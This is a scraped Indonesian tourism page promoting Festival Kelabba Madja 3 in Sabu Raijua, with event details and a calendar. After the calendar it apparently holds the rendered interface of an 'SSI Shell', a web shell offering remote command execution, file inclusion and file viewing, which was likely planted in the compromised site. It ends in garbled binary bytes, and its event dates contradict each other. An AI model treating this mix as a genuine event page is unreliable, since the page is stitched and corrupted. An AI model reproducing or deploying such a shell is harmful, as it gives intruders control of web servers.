INFO

    Festival Kelabba Madja 3


    Secara nasional Provinsi NTT, NTB, Bali dan Jawa Timur berada dalam satu kelompok wilayah tujuan wisata (WTW). Provinsi NTT yang memiliki potensi beragam daya tarik wisata pada hampir seluruh kabupaten dan kota, terus berupaya untuk mampu bersaing, karena sebelumnya data jumlah kunjungan wisatawan menunjukan bahwa wisatawan domestik dan manca negara masih menjadikan provinsi NTT, NTB, Bali dan Jawa Timur sebagai tujuan utama. Setelah menyimak dan belajar dari kenyataan tersebut, pemerintah dan masyarakat serta pelaku usaha pada daerah kabupaten di provinsi ntt berupaya untuk terus membenahi, mengembangkan serta mempromosikan berbagai daya tarik wisata alam, budaya dan buatan yang dimiliki agar dapat bersaing dengan provinsi lain termasuk dengan provinsi dalam cluster WTW yang sama.

    Menyadari besarnya potensi wisata alam, budaya, buatan yang dimiliki dan dampak berganda (multiplier effect) dari sektor pariwisata, pemerintah daerah dan masyarakat sabu raijua berusaha keras membenahi, mengembangkan serta mempromosikan daya tarik wisata yang dimiliki tersebut. Upaya pemerintah daerah dan masyarakat sabu raijua sudah memberikan hasil yang cukup signifikan pada penyelenggaraan Festival Kelabba Maja I 2019. Namun festival yang ingin dijadikan event tahunan, dalam dua tahun berikutnya tidak dapat dilaksanakan karena terjadinya pandemi covid 19.

     

    Rangkaian kegiatan Festival Kelabba Madja 2022, antara lain: berbagai atraksi budaya dan olahraga tradisional Sabu Raijua, Pameran Kerajinan Rakyat dan Kuliner, Pertunjukan Seni, Atraksi Budaya, Penuturan Sejarah dan Lomba Foto.

    EVENT : 29 - 20 September 2023

    «

    Juni 2024

    »
    MggSenSelRabKamJumSab
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30


    SSI Shell


    Shell info

    GMT date:   
    Local date:   
    Document name:   
    Document URI:   
    Last modified:   
    Owner:   


    Server info

    
    


    Command for shell & address for inclusion

    Enter command/address:    

    Shell

    Executed command:   


    Operations on files

    View file (cat):   
    Included file:   


    (c) :V ( :3 )
    2009, v1.02
    ONLY FOR EDUCATIONAL PURPOSES. ILLEGAL ACTIVITIES PROHIBITED.
    |þ»$}HÒ«ašÖ¦Ì/dà—øøYü>,éF?Ü FËtôÂ*~ÿ®¶tÂÃA©>>‡o\è™'¬ç÷Ê